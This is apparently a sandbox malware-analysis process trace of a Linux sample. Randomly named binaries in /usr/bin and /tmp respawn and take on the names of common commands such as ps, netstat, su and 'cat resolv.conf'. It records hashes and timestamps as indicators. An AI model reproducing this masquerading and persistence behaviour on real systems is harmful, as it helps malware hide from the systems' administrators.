                                                                  File size:625867 bytes
                                                                  MD5 hash:a14578469fab44514dfca6c4eead755d

                                                                  Start time (UTC):13:34:20
                                                                  Start date (UTC):20/08/2024
                                                                  Path:/usr/bin/eqznayducj
                                                                  Arguments:/usr/bin/eqznayducj sh 6230
                                                                  File size:625878 bytes
                                                                  MD5 hash:9a54fa11d5b90703482052dcd884c96b

                                                                  Start time (UTC):13:34:20
                                                                  Start date (UTC):20/08/2024
                                                                  Path:/usr/bin/eqznayducj
                                                                  Arguments:-
                                                                  File size:625878 bytes
                                                                  MD5 hash:9a54fa11d5b90703482052dcd884c96b

                                                                  Start time (UTC):13:34:20
                                                                  Start date (UTC):20/08/2024
                                                                  Path:/tmp/HaJTqGiPpD
                                                                  Arguments:-
                                                                  File size:625867 bytes
                                                                  MD5 hash:a14578469fab44514dfca6c4eead755d

                                                                  Start time (UTC):13:34:20
                                                                  Start date (UTC):20/08/2024
                                                                  Path:/tmp/HaJTqGiPpD
                                                                  Arguments:-
                                                                  File size:625867 bytes
                                                                  MD5 hash:a14578469fab44514dfca6c4eead755d

                                                                  Start time (UTC):13:34:20
                                                                  Start date (UTC):20/08/2024
                                                                  Path:/usr/bin/eqznayducj
                                                                  Arguments:/usr/bin/eqznayducj ifconfig 6230
                                                                  File size:625878 bytes
                                                                  MD5 hash:9a54fa11d5b90703482052dcd884c96b

                                                                  Start time (UTC):13:34:20
                                                                  Start date (UTC):20/08/2024
                                                                  Path:/usr/bin/eqznayducj
                                                                  Arguments:-
                                                                  File size:625878 bytes
                                                                  MD5 hash:9a54fa11d5b90703482052dcd884c96b

                                                                  Start time (UTC):13:34:20
                                                                  Start date (UTC):20/08/2024
                                                                  Path:/tmp/HaJTqGiPpD
                                                                  Arguments:-
                                                                  File size:625867 bytes
                                                                  MD5 hash:a14578469fab44514dfca6c4eead755d

                                                                  Start time (UTC):13:34:20
                                                                  Start date (UTC):20/08/2024
                                                                  Path:/tmp/HaJTqGiPpD
                                                                  Arguments:-
                                                                  File size:625867 bytes
                                                                  MD5 hash:a14578469fab44514dfca6c4eead755d

                                                                  Start time (UTC):13:34:20
                                                                  Start date (UTC):20/08/2024
                                                                  Path:/usr/bin/eqznayducj
                                                                  Arguments:/usr/bin/eqznayducj top 6230
                                                                  File size:625878 bytes
                                                                  MD5 hash:9a54fa11d5b90703482052dcd884c96b

                                                                  Start time (UTC):13:34:20
                                                                  Start date (UTC):20/08/2024
                                                                  Path:/usr/bin/eqznayducj
                                                                  Arguments:-
                                                                  File size:625878 bytes
                                                                  MD5 hash:9a54fa11d5b90703482052dcd884c96b

                                                                  Start time (UTC):13:34:20
                                                                  Start date (UTC):20/08/2024
                                                                  Path:/tmp/HaJTqGiPpD
                                                                  Arguments:-
                                                                  File size:625867 bytes
                                                                  MD5 hash:a14578469fab44514dfca6c4eead755d

                                                                  Start time (UTC):13:34:20
                                                                  Start date (UTC):20/08/2024
                                                                  Path:/tmp/HaJTqGiPpD
                                                                  Arguments:-
                                                                  File size:625867 bytes
                                                                  MD5 hash:a14578469fab44514dfca6c4eead755d

                                                                  Start time (UTC):13:34:20
                                                                  Start date (UTC):20/08/2024
                                                                  Path:/usr/bin/eqznayducj
                                                                  Arguments:/usr/bin/eqznayducj "ifconfig eth0" 6230
                                                                  File size:625878 bytes
                                                                  MD5 hash:9a54fa11d5b90703482052dcd884c96b

                                                                  Start time (UTC):13:34:20
                                                                  Start date (UTC):20/08/2024
                                                                  Path:/usr/bin/eqznayducj
                                                                  Arguments:-
                                                                  File size:625878 bytes
                                                                  MD5 hash:9a54fa11d5b90703482052dcd884c96b

                                                                  Start time (UTC):13:34:25
                                                                  Start date (UTC):20/08/2024
                                                                  Path:/tmp/HaJTqGiPpD
                                                                  Arguments:-
                                                                  File size:625867 bytes
                                                                  MD5 hash:a14578469fab44514dfca6c4eead755d

                                                                  Start time (UTC):13:34:25
                                                                  Start date (UTC):20/08/2024
                                                                  Path:/tmp/HaJTqGiPpD
                                                                  Arguments:-
                                                                  File size:625867 bytes
                                                                  MD5 hash:a14578469fab44514dfca6c4eead755d

                                                                  Start time (UTC):13:34:25
                                                                  Start date (UTC):20/08/2024
                                                                  Path:/usr/bin/ibkljkndlm
                                                                  Arguments:/usr/bin/ibkljkndlm su 6230
                                                                  File size:625878 bytes
                                                                  MD5 hash:f509e839e4e038de164ecdecb9aa9404

                                                                  Start time (UTC):13:34:25
                                                                  Start date (UTC):20/08/2024
                                                                  Path:/usr/bin/ibkljkndlm
                                                                  Arguments:-
                                                                  File size:625878 bytes
                                                                  MD5 hash:f509e839e4e038de164ecdecb9aa9404

                                                                  Start time (UTC):13:34:25
                                                                  Start date (UTC):20/08/2024
                                                                  Path:/tmp/HaJTqGiPpD
                                                                  Arguments:-
                                                                  File size:625867 bytes
                                                                  MD5 hash:a14578469fab44514dfca6c4eead755d

                                                                  Start time (UTC):13:34:25
                                                                  Start date (UTC):20/08/2024
                                                                  Path:/tmp/HaJTqGiPpD
                                                                  Arguments:-
                                                                  File size:625867 bytes
                                                                  MD5 hash:a14578469fab44514dfca6c4eead755d

                                                                  Start time (UTC):13:34:25
                                                                  Start date (UTC):20/08/2024
                                                                  Path:/usr/bin/ibkljkndlm
                                                                  Arguments:/usr/bin/ibkljkndlm ls 6230
                                                                  File size:625878 bytes
                                                                  MD5 hash:f509e839e4e038de164ecdecb9aa9404

                                                                  Start time (UTC):13:34:25
                                                                  Start date (UTC):20/08/2024
                                                                  Path:/usr/bin/ibkljkndlm
                                                                  Arguments:-
                                                                  File size:625878 bytes
                                                                  MD5 hash:f509e839e4e038de164ecdecb9aa9404

                                                                  Start time (UTC):13:34:25
                                                                  Start date (UTC):20/08/2024
                                                                  Path:/tmp/HaJTqGiPpD
                                                                  Arguments:-
                                                                  File size:625867 bytes
                                                                  MD5 hash:a14578469fab44514dfca6c4eead755d

                                                                  Start time (UTC):13:34:25
                                                                  Start date (UTC):20/08/2024
                                                                  Path:/tmp/HaJTqGiPpD
                                                                  Arguments:-
                                                                  File size:625867 bytes
                                                                  MD5 hash:a14578469fab44514dfca6c4eead755d

                                                                  Start time (UTC):13:34:25
                                                                  Start date (UTC):20/08/2024
                                                                  Path:/usr/bin/ibkljkndlm
                                                                  Arguments:/usr/bin/ibkljkndlm "netstat -antop" 6230
                                                                  File size:625878 bytes
                                                                  MD5 hash:f509e839e4e038de164ecdecb9aa9404

                                                                  Start time (UTC):13:34:26
                                                                  Start date (UTC):20/08/2024
                                                                  Path:/usr/bin/ibkljkndlm
                                                                  Arguments:-
                                                                  File size:625878 bytes
                                                                  MD5 hash:f509e839e4e038de164ecdecb9aa9404

                                                                  Start time (UTC):13:34:25
                                                                  Start date (UTC):20/08/2024
                                                                  Path:/tmp/HaJTqGiPpD
                                                                  Arguments:-
                                                                  File size:625867 bytes
                                                                  MD5 hash:a14578469fab44514dfca6c4eead755d

                                                                  Start time (UTC):13:34:25
                                                                  Start date (UTC):20/08/2024
                                                                  Path:/tmp/HaJTqGiPpD
                                                                  Arguments:-
                                                                  File size:625867 bytes
                                                                  MD5 hash:a14578469fab44514dfca6c4eead755d

                                                                  Start time (UTC):13:34:25
                                                                  Start date (UTC):20/08/2024
                                                                  Path:/usr/bin/ibkljkndlm
                                                                  Arguments:/usr/bin/ibkljkndlm "ps -ef" 6230
                                                                  File size:625878 bytes
                                                                  MD5 hash:f509e839e4e038de164ecdecb9aa9404

                                                                  Start time (UTC):13:34:26
                                                                  Start date (UTC):20/08/2024
                                                                  Path:/usr/bin/ibkljkndlm
                                                                  Arguments:-
                                                                  File size:625878 bytes
                                                                  MD5 hash:f509e839e4e038de164ecdecb9aa9404

                                                                  Start time (UTC):13:34:26
                                                                  Start date (UTC):20/08/2024
                                                                  Path:/tmp/HaJTqGiPpD
                                                                  Arguments:-
                                                                  File size:625867 bytes
                                                                  MD5 hash:a14578469fab44514dfca6c4eead755d

                                                                  Start time (UTC):13:34:26
                                                                  Start date (UTC):20/08/2024
                                                                  Path:/tmp/HaJTqGiPpD
                                                                  Arguments:-
                                                                  File size:625867 bytes
                                                                  MD5 hash:a14578469fab44514dfca6c4eead755d

                                                                  Start time (UTC):13:34:26
                                                                  Start date (UTC):20/08/2024
                                                                  Path:/usr/bin/ibkljkndlm
                                                                  Arguments:/usr/bin/ibkljkndlm "cd /etc" 6230
                                                                  File size:625878 bytes
                                                                  MD5 hash:f509e839e4e038de164ecdecb9aa9404

                                                                  Start time (UTC):13:34:26
                                                                  Start date (UTC):20/08/2024
                                                                  Path:/usr/bin/ibkljkndlm
                                                                  Arguments:-
                                                                  File size:625878 bytes
                                                                  MD5 hash:f509e839e4e038de164ecdecb9aa9404

                                                                  Start time (UTC):13:34:31
                                                                  Start date (UTC):20/08/2024
                                                                  Path:/tmp/HaJTqGiPpD
                                                                  Arguments:-
                                                                  File size:625867 bytes
                                                                  MD5 hash:a14578469fab44514dfca6c4eead755d

                                                                  Start time (UTC):13:34:31
                                                                  Start date (UTC):20/08/2024
                                                                  Path:/tmp/HaJTqGiPpD
                                                                  Arguments:-
                                                                  File size:625867 bytes
                                                                  MD5 hash:a14578469fab44514dfca6c4eead755d

                                                                  Start time (UTC):13:34:31
                                                                  Start date (UTC):20/08/2024
                                                                  Path:/usr/bin/oarnkspbbo
                                                                  Arguments:/usr/bin/oarnkspbbo who 6230
                                                                  File size:625878 bytes
                                                                  MD5 hash:3d96ab25c872e7fc62945f69932798cd

                                                                  Start time (UTC):13:34:31
                                                                  Start date (UTC):20/08/2024
                                                                  Path:/usr/bin/oarnkspbbo
                                                                  Arguments:-
                                                                  File size:625878 bytes
                                                                  MD5 hash:3d96ab25c872e7fc62945f69932798cd

                                                                  Start time (UTC):13:34:31
                                                                  Start date (UTC):20/08/2024
                                                                  Path:/tmp/HaJTqGiPpD
                                                                  Arguments:-
                                                                  File size:625867 bytes
                                                                  MD5 hash:a14578469fab44514dfca6c4eead755d

                                                                  Start time (UTC):13:34:31
                                                                  Start date (UTC):20/08/2024
                                                                  Path:/tmp/HaJTqGiPpD
                                                                  Arguments:-
                                                                  File size:625867 bytes
                                                                  MD5 hash:a14578469fab44514dfca6c4eead755d

                                                                  Start time (UTC):13:34:31
                                                                  Start date (UTC):20/08/2024
                                                                  Path:/usr/bin/oarnkspbbo
                                                                  Arguments:/usr/bin/oarnkspbbo "sleep 1" 6230
                                                                  File size:625878 bytes
                                                                  MD5 hash:3d96ab25c872e7fc62945f69932798cd

                                                                  Start time (UTC):13:34:31
                                                                  Start date (UTC):20/08/2024
                                                                  Path:/usr/bin/oarnkspbbo
                                                                  Arguments:-
                                                                  File size:625878 bytes
                                                                  MD5 hash:3d96ab25c872e7fc62945f69932798cd

                                                                  Start time (UTC):13:34:31
                                                                  Start date (UTC):20/08/2024
                                                                  Path:/tmp/HaJTqGiPpD
                                                                  Arguments:-
                                                                  File size:625867 bytes
                                                                  MD5 hash:a14578469fab44514dfca6c4eead755d

                                                                  Start time (UTC):13:34:31
                                                                  Start date (UTC):20/08/2024
                                                                  Path:/tmp/HaJTqGiPpD
                                                                  Arguments:-
                                                                  File size:625867 bytes
                                                                  MD5 hash:a14578469fab44514dfca6c4eead755d

                                                                  Start time (UTC):13:34:31
                                                                  Start date (UTC):20/08/2024
                                                                  Path:/usr/bin/oarnkspbbo
                                                                  Arguments:/usr/bin/oarnkspbbo "sleep 1" 6230
                                                                  File size:625878 bytes
                                                                  MD5 hash:3d96ab25c872e7fc62945f69932798cd

                                                                  Start time (UTC):13:34:31
                                                                  Start date (UTC):20/08/2024
                                                                  Path:/usr/bin/oarnkspbbo
                                                                  Arguments:-
                                                                  File size:625878 bytes
                                                                  MD5 hash:3d96ab25c872e7fc62945f69932798cd

                                                                  Start time (UTC):13:34:31
                                                                  Start date (UTC):20/08/2024
                                                                  Path:/tmp/HaJTqGiPpD
                                                                  Arguments:-
                                                                  File size:625867 bytes
                                                                  MD5 hash:a14578469fab44514dfca6c4eead755d

                                                                  Start time (UTC):13:34:31
                                                                  Start date (UTC):20/08/2024
                                                                  Path:/tmp/HaJTqGiPpD
                                                                  Arguments:-
                                                                  File size:625867 bytes
                                                                  MD5 hash:a14578469fab44514dfca6c4eead755d

                                                                  Start time (UTC):13:34:31
                                                                  Start date (UTC):20/08/2024
                                                                  Path:/usr/bin/oarnkspbbo
                                                                  Arguments:/usr/bin/oarnkspbbo "cat resolv.conf" 6230
                                                                  File size:625878 bytes
                                                                  MD5 hash:3d96ab25c872e7fc62945f69932798cd

                                                                  Start time (UTC):13:34:31
                                                                  Start date (UTC):20/08/2024
                                                                  Path:/usr/bin/oarnkspbbo
                                                                  Arguments:-
                                                                  File size:625878 bytes
                                                                  MD5 hash:3d96ab25c872e7fc62945f69932798cd

                                                                  Start time (UTC):13:34:31
                                                                  Start date (UTC):20/08/2024
                                                                  Path:/tmp/HaJTqGiPpD
                                                                  Arguments:-
                                                                  File size:625867 bytes
                                                                  MD5 hash:a14578469fab44514dfca6c4eead755d

                                                                  Start time (UTC):13:34:31
                                                                  Start date (UTC):20/08/2024
                                                                  Path:/tmp/HaJTqGiPpD
                                                                  Arguments:-
                                                                  File size:625867 bytes
                                                                  MD5 hash:a14578469fab44514dfca6c4eead755d

                                                                  Start time (UTC):13:34:31
                                                                  Start date (UTC):20/08/2024
                                                                  Path:/usr/bin/oarnkspbbo
                                                                  Arguments:/usr/bin/oarnkspbbo su 6230
                                                                  File size:625878 bytes
                                                                  MD5 hash:3d96ab25c872e7fc62945f69932798cd

                                                                  Start time (UTC):13:34:31
                                                                  Start date (UTC):20/08/2024
                                                                  Path:/usr/bin/oarnkspbbo
                                                                  Arguments:-
                                                                  File size:625878 bytes
                                                                  MD5 hash:3d96ab25c872e7fc62945f69932798cd

                                                                  Start time (UTC):13:34:36
                                                                  Start date (UTC):20/08/2024
                                                                  Path:/tmp/HaJTqGiPpD
                                                                  Arguments:-
                                                                  File size:625867 bytes
                                                                  MD5 hash:a14578469fab44514dfca6c4eead755d

                                                                  Start time (UTC):13:34:36
                                                                  Start date (UTC):20/08/2024
                                                                  Path:/tmp/HaJTqGiPpD
                                                                  Arguments:-
                                                                  File size:625867 bytes
                                                                  MD5 hash:a14578469fab44514dfca6c4eead755d

                                                                  Start time (UTC):13:34:36
                                                                  Start date (UTC):20/08/2024
                                                                  Path:/usr/bin/ungjrprpkb
                                                                  Arguments:/usr/bin/ungjrprpkb "netstat -antop" 6230
                                                                  File size:625878 bytes
                                                                  MD5 hash:3f65b405d072a72c577de91340204441

                                                                  Start time (UTC):13:34:36
                                                                  Start date (UTC):20/08/2024
                                                                  Path:/usr/bin/ungjrprpkb
                                                                  Arguments:-
                                                                  File size:625878 bytes
                                                                  MD5 hash:3f65b405d072a72c577de91340204441

                                                                  Start time (UTC):13:34:36
                                                                  Start date (UTC):20/08/2024
                                                                  Path:/tmp/HaJTqGiPpD
                                                                  Arguments:-
                                                                  File size:625867 bytes
                                                                  MD5 hash:a14578469fab44514dfca6c4eead755d

                                                                  Start time (UTC):13:34:36
                                                                  Start date (UTC):20/08/2024
                                                                  Path:/tmp/HaJTqGiPpD
                                                                  Arguments:-
                                                                  File size:625867 bytes
                                                                  MD5 hash:a14578469fab44514dfca6c4eead755d

                                                                  Start time (UTC):13:34:36
                                                                  Start date (UTC):20/08/2024
                                                                  Path:/usr/bin/ungjrprpkb
                                                                  Arguments:/usr/bin/ungjrprpkb "cd /etc" 6230
                                                                  File size:625878 bytes
                                                                  MD5 hash:3f65b405d072a72c577de91340204441

                                                                  Start time (UTC):13:34:36
                                                                  Start date (UTC):20/08/2024
                                                                  Path:/usr/bin/ungjrprpkb
                                                                  Arguments:-
                                                                  File size:625878 bytes
                                                                  MD5 hash:3f65b405d072a72c577de91340204441

                                                                  Start time (UTC):13:34:36
                                                                  Start date (UTC):20/08/2024
                                                                  Path:/tmp/HaJTqGiPpD
                                                                  Arguments:-
                                                                  File size:625867 bytes
                                                                  MD5 hash:a14578469fab44514dfca6c4eead755d

                                                                  Start time (UTC):13:34:36
                                                                  Start date (UTC):20/08/2024
                                                                  Path:/tmp/HaJTqGiPpD
                                                                  Arguments:-
                                                                  File size:625867 bytes
                                                                  MD5 hash:a14578469fab44514dfca6c4eead755d

                                                                  Start time (UTC):13:34:36
                                                                  Start date (UTC):20/08/2024
                                                                  Path:/usr/bin/ungjrprpkb
                                                                  Arguments:/usr/bin/ungjrprpkb "ls -la" 6230
                                                                  File size:625878 bytes
                                                                  MD5 hash:3f65b405d072a72c577de91340204441

                                                                  Start time (UTC):13:34:36
                                                                  Start date (UTC):20/08/2024
                                                                  Path:/usr/bin/ungjrprpkb
                                                                  Arguments:-
                                                                  File size:625878 bytes
                                                                  MD5 hash:3f65b405d072a72c577de91340204441

                                                                  Start time (UTC):13:34:36
                                                                  Start date (UTC):20/08/2024
                                                                  Path:/tmp/HaJTqGiPpD
                                                                  Arguments:-
                                                                  File size:625867 bytes
                                                                  MD5 hash:a14578469fab44514dfca6c4eead755d

                                                                  Start time (UTC):13:34:36
                                                                  Start date (UTC):20/08/2024
                                                                  Path:/tmp/HaJTqGiPpD
                                                                  Arguments:-
                                                                  File size:625867 bytes
                                                                  MD5 hash:a14578469fab44514dfca6c4eead755d

                                                                  Start time (UTC):13:34:36
                                                                  Start date (UTC):20/08/2024
                                                                  Path:/usr/bin/ungjrprpkb
                                                                  Arguments:/usr/bin/ungjrprpkb uptime 6230
                                                                  File size:625878 bytes
                                                                  MD5 hash:3f65b405d072a72c577de91340204441

                                                                  Start time (UTC):13:34:36
                                                                  Start date (UTC):20/08/2024
                                                                  Path:/usr/bin/ungjrprpkb
                                                                  Arguments:-
                                                                  File size:625878 bytes
                                                                  MD5 hash:3f65b405d072a72c577de91340204441

                                                                  Start time (UTC):13:34:36
                                                                  Start date (UTC):20/08/2024
                                                                  Path:/tmp/HaJTqGiPpD
                                                                  Arguments:-
                                                                  File size:625867 bytes
                                                                  MD5 hash:a14578469fab44514dfca6c4eead755d

                                                                  Start time (UTC):13:34:36
                                                                  Start date (UTC):20/08/2024
                                                                  Path:/tmp/HaJTqGiPpD
                                                                  Arguments:-
                                                                  File size:625867 bytes
                                                                  MD5 hash:a14578469fab44514dfca6c4eead755d

                                                                  Start time (UTC):13:34:36
                                                                  Start date (UTC):20/08/2024
                                                                  Path:/usr/bin/ungjrprpkb
                                                                  Arguments:/usr/bin/ungjrprpkb "route -n" 6230
                                                                  File size:625878 bytes
                                                                  MD5 hash:3f65b405d072a72c577de91340204441

                                                                  Start time (UTC):13:34:36
                                                                  Start date (UTC):20/08/2024
                                                                  Path:/usr/bin/ungjrprpkb
                                                                  Arguments:-
                                                                  File size:625878 bytes
                                                                  MD5 hash:3f65b405d072a72c577de91340204441

                                                                  Start time (UTC):13:34:41
                                                                  Start date (UTC):20/08/2024
                                                                  Path:/tmp/HaJTqGiPpD
                                                                  Arguments:-
                                                                  File size:625867 bytes
                                                                  MD5 hash:a14578469fab44514dfca6c4eead755d

                                                                  Start time (UTC):13:34:41
                                                                  Start date (UTC):20/08/2024
                                                                  Path:/tmp/HaJTqGiPpD
                                                                  Arguments:-
                                                                  File size:625867 bytes
                                                                  MD5 hash:a14578469fab44514dfca6c4eead755d

                                                                  Start time (UTC):13:34:41
                                                                  Start date (UTC):20/08/2024
                                                                  Path:/usr/bin/gdmrzwxnqy
                                                                  Arguments:/usr/bin/gdmrzwxnqy su 6230
                                                                  File size:625878 bytes
                                                                  MD5 hash:7ece6ba9fe32b7d91c5dcf497de20033

                                                                  Start time (UTC):13:34:41
                                                                  Start date (UTC):20/08/2024
                                                                  Path:/usr/bin/gdmrzwxnqy
                                                                  Arguments:-
                                                                  File size:625878 bytes
                                                                  MD5 hash:7ece6ba9fe32b7d91c5dcf497de20033

                                                                  Start time (UTC):13:34:41
                                                                  Start date (UTC):20/08/2024
                                                                  Path:/tmp/HaJTqGiPpD
                                                                  Arguments:-
                                                                  File size:625867 bytes
                                                                  MD5 hash:a14578469fab44514dfca6c4eead755d

                                                                  Start time (UTC):13:34:41
                                                                  Start date (UTC):20/08/2024
                                                                  Path:/tmp/HaJTqGiPpD
                                                                  Arguments:-
                                                                  File size:625867 bytes
                                                                  MD5 hash:a14578469fab44514dfca6c4eead755d

                                                                  Start time (UTC):13:34:41
                                                                  Start date (UTC):20/08/2024
                                                                  Path:/usr/bin/gdmrzwxnqy
                                                                  Arguments:/usr/bin/gdmrzwxnqy su 6230
                                                                  File size:625878 bytes
                                                                  MD5 hash:7ece6ba9fe32b7d91c5dcf497de20033

                                                                  Start time (UTC):13:34:42
                                                                  Start date (UTC):20/08/2024
                                                                  Path:/usr/bin/gdmrzwxnqy
                                                                  Arguments:-
                                                                  File size:625878 bytes
                                                                  MD5 hash:7ece6ba9fe32b7d91c5dcf497de20033

                                                                  Start time (UTC):13:34:42
                                                                  Start date (UTC):20/08/2024
                                                                  Path:/tmp/HaJTqGiPpD
                                                                  Arguments:-
                                                                  File size:625867 bytes
                                                                  MD5 hash:a14578469fab44514dfca6c4eead755d

                                                                  Start time (UTC):13:34:42
                                                                  Start date (UTC):20/08/2024
                                                                  Path:/tmp/HaJTqGiPpD
                                                                  Arguments:-
                                                                  File size:625867 bytes
                                                                  MD5 hash:a14578469fab44514dfca6c4eead755d

                                                                  Start time (UTC):13:34:42
                                                                  Start date (UTC):20/08/2024
                                                                  Path:/usr/bin/gdmrzwxnqy
                                                                  Arguments:/usr/bin/gdmrzwxnqy who 6230
                                                                  File size:625878 bytes
                                                                  MD5 hash:7ece6ba9fe32b7d91c5dcf497de20033

                                                                  Start time (UTC):13:34:42
                                                                  Start date (UTC):20/08/2024
                                                                  Path:/usr/bin/gdmrzwxnqy
                                                                  Arguments:-
                                                                  File size:625878 bytes
                                                                  MD5 hash:7ece6ba9fe32b7d91c5dcf497de20033

                                                                  Start time (UTC):13:34:42
                                                                  Start date (UTC):20/08/2024
                                                                  Path:/tmp/HaJTqGiPpD
                                                                  Arguments:-
                                                                  File size:625867 bytes
                                                                  MD5 hash:a14578469fab44514dfca6c4eead755d

                                                                  Start time (UTC):13:34:42
                                                                  Start date (UTC):20/08/2024
                                                                  Path:/tmp/HaJTqGiPpD
                                                                  Arguments:-
                                                                  File size:625867 bytes
                                                                  MD5 hash:a14578469fab44514dfca6c4eead755d

                                                                  Start time (UTC):13:34:42
                                                                  Start date (UTC):20/08/2024
                                                                  Path:/usr/bin/gdmrzwxnqy
                                                                  Arguments:/usr/bin/gdmrzwxnqy "ps -ef" 6230
                                                                  File size:625878 bytes
                                                                  MD5 hash:7ece6ba9fe32b7d91c5dcf497de20033

                                                                  Start time (UTC):13:34:42
                                                                  Start date (UTC):20/08/2024
                                                                  Path:/usr/bin/gdmrzwxnqy
                                                                  Arguments:-
                                                                  File size:625878 bytes
                                                                  MD5 hash:7ece6ba9fe32b7d91c5dcf497de20033

                                                                  Start time (UTC):13:34:42
                                                                  Start date (UTC):20/08/2024
                                                                  Path:/tmp/HaJTqGiPpD
                                                                  Arguments:-
                                                                  File size:625867 bytes
                                                                  MD5 hash:a14578469fab44514dfca6c4eead755d

                                                                  Start time (UTC):13:34:42
                                                                  Start date (UTC):20/08/2024
                                                                  Path:/tmp/HaJTqGiPpD
                                                                  Arguments:-
                                                                  File size:625867 bytes
                                                                  MD5 hash:a14578469fab44514dfca6c4eead755d

                                                                  Start time (UTC):13:34:42
                                                                  Start date (UTC):20/08/2024
                                                                  Path:/usr/bin/gdmrzwxnqy
                                                                  Arguments:/usr/bin/gdmrzwxnqy sh 6230
                                                                  File size:625878 bytes
                                                                  MD5 hash:7ece6ba9fe32b7d91c5dcf497de20033

                                                                  Start time (UTC):13:34:42
                                                                  Start date (UTC):20/08/2024
                                                                  Path:/usr/bin/gdmrzwxnqy
                                                                  Arguments:-
                                                                  File size:625878 bytes
                                                                  MD5 hash:7ece6ba9fe32b7d91c5dcf497de20033

                                                                  Start time (UTC):13:34:47
                                                                  Start date (UTC):20/08/2024
                                                                  Path:/tmp/HaJTqGiPpD
                                                                  Arguments:-
                                                                  File size:625867 bytes
                                                                  MD5 hash:a14578469fab44514dfca6c4eead755d

                                                                  Start time (UTC):13:34:47
                                                                  Start date (UTC):20/08/2024
                                                                  Path:/tmp/HaJTqGiPpD
                                                                  Arguments:-
                                                                  File size:625867 bytes
                                                                  MD5 hash:a14578469fab44514dfca6c4eead755d

                                                                  Start time (UTC):13:34:47
                                                                  Start date (UTC):20/08/2024
                                                                  Path:/usr/bin/eperfpvgsg
                                                                  Arguments:/usr/bin/eperfpvgsg ls 6230
                                                                  File size:625878 bytes
                                                                  MD5 hash:c73832bb64ed9d499daa35bea23c2bf5

                                                                  Start time (UTC):13:34:47
                                                                  Start date (UTC):20/08/2024
                                                                  Path:/usr/bin/eperfpvgsg
                                                                  Arguments:-
                                                                  File size:625878 bytes
                                                                  MD5 hash:c73832bb64ed9d499daa35bea23c2bf5

                                                                  Start time (UTC):13:34:47
                                                                  Start date (UTC):20/08/2024
                                                                  Path:/tmp/HaJTqGiPpD
                                                                  Arguments:-
                                                                  File size:625867 bytes
                                                                  MD5 hash:a14578469fab44514dfca6c4eead755d

                                                                  Start time (UTC):13:34:47
                                                                  Start date (UTC):20/08/2024
                                                                  Path:/tmp/HaJTqGiPpD
                                                                  Arguments:-
                                                                  File size:625867 bytes
                                                                  MD5 hash:a14578469fab44514dfca6c4eead755d

                                                                  Start time (UTC):13:34:47
                                                                  Start date (UTC):20/08/2024
                                                                  Path:/usr/bin/eperfpvgsg
                                                                  Arguments:/usr/bin/eperfpvgsg "cat resolv.conf" 6230
                                                                  File size:625878 bytes
                                                                  MD5 hash:c73832bb64ed9d499daa35bea23c2bf5

                                                                  Start time (UTC):13:34:47
                                                                  Start date (UTC):20/08/2024
                                                                  Path:/usr/bin/eperfpvgsg
                                                                  Arguments:-
                                                                  File size:625878 bytes
                                                                  MD5 hash:c73832bb64ed9d499daa35bea23c2bf5

                                                                  Start time (UTC):13:34:47
                                                                  Start date (UTC):20/08/2024
                                                                  Path:/tmp/HaJTqGiPpD
                                                                  Arguments:-
                                                                  File size:625867 bytes
                                                                  MD5 hash:a14578469fab44514dfca6c4eead755d

                                                                  Start time (UTC):13:34:47
                                                                  Start date (UTC):20/08/2024
                                                                  Path:/tmp/HaJTqGiPpD
                                                                  Arguments:-
                                                                  File size:625867 bytes
                                                                  MD5 hash:a14578469fab44514dfca6c4eead755d

                                                                  Start time (UTC):13:34:47
                                                                  Start date (UTC):20/08/2024
                                                                  Path:/usr/bin/eperfpvgsg
                                                                  Arguments:/usr/bin/eperfpvgsg ls 6230
                                                                  File size:625878 bytes
                                                                  MD5 hash:c73832bb64ed9d499daa35bea23c2bf5

                                                                  Start time (UTC):13:34:47
                                                                  Start date (UTC):20/08/2024
                                                                  Path:/usr/bin/eperfpvgsg
                                                                  Arguments:-
                                                                  File size:625878 bytes
                                                                  MD5 hash:c73832bb64ed9d499daa35bea23c2bf5

                                                                  Start time (UTC):13:34:47
                                                                  Start date (UTC):20/08/2024
                                                                  Path:/tmp/HaJTqGiPpD
                                                                  Arguments:-
                                                                  File size:625867 bytes
                                                                  MD5 hash:a14578469fab44514dfca6c4eead755d

                                                                  Start time (UTC):13:34:47
                                                                  Start date (UTC):20/08/2024
                                                                  Path:/tmp/HaJTqGiPpD
                                                                  Arguments:-
                                                                  File size:625867 bytes
                                                                  MD5 hash:a14578469fab44514dfca6c4eead755d

                                                                  Start time (UTC):13:34:47
                                                                  Start date (UTC):20/08/2024
                                                                  Path:/usr/bin/eperfpvgsg
                                                                  Arguments:/usr/bin/eperfpvgsg "ls -la" 6230
                                                                  File size:625878 bytes
                                                                  MD5 hash:c73832bb64ed9d499daa35bea23c2bf5

                                                                  Start time (UTC):13:34:47
                                                                  Start date (UTC):20/08/2024
                                                                  Path:/usr/bin/eperfpvgsg
                                                                  Arguments:-
                                                                  File size:625878 bytes
                                                                  MD5 hash:c73832bb64ed9d499daa35bea23c2bf5

                                                                  Start time (UTC):13:34:47
                                                                  Start date (UTC):20/08/2024
                                                                  Path:/tmp/HaJTqGiPpD
                                                                  Arguments:-
                                                                  File size:625867 bytes
                                                                  MD5 hash:a14578469fab44514dfca6c4eead755d

                                                                  Start time (UTC):13:34:47
                                                                  Start date (UTC):20/08/2024
                                                                  Path:/tmp/HaJTqGiPpD
                                                                  Arguments:-
                                                                  File size:625867 bytes
                                                                  MD5 hash:a14578469fab44514dfca6c4eead755d

                                                                  Start time (UTC):13:34:47
                                                                  Start date (UTC):20/08/2024
                                                                  Path:/usr/bin/eperfpvgsg
                                                                  Arguments:/usr/bin/eperfpvgsg pwd 6230
                                                                  File size:625878 bytes
                                                                  MD5 hash:c73832bb64ed9d499daa35bea23c2bf5

                                                                  Start time (UTC):13:34:47
                                                                  Start date (UTC):20/08/2024
                                                                  Path:/usr/bin/eperfpvgsg
                                                                  Arguments:-
                                                                  File size:625878 bytes
                                                                  MD5 hash:c73832bb64ed9d499daa35bea23c2bf5

                                                                  Start time (UTC):13:34:52
                                                                  Start date (UTC):20/08/2024
                                                                  Path:/tmp/HaJTqGiPpD
                                                                  Arguments:-
                                                                  File size:625867 bytes
                                                                  MD5 hash:a14578469fab44514dfca6c4eead755d

                                                                  Start time (UTC):13:34:52
                                                                  Start date (UTC):20/08/2024
                                                                  Path:/tmp/HaJTqGiPpD
                                                                  Arguments:-
                                                                  File size:625867 bytes
                                                                  MD5 hash:a14578469fab44514dfca6c4eead755d

                                                                  Start time (UTC):13:34:52
                                                                  Start date (UTC):20/08/2024
                                                                  Path:/usr/bin/kfgwgvyckw
                                                                  Arguments:/usr/bin/kfgwgvyckw "sleep 1" 6230
                                                                  File size:625889 bytes
                                                                  MD5 hash:30de9814b108653bd6e70efbc3520d2e

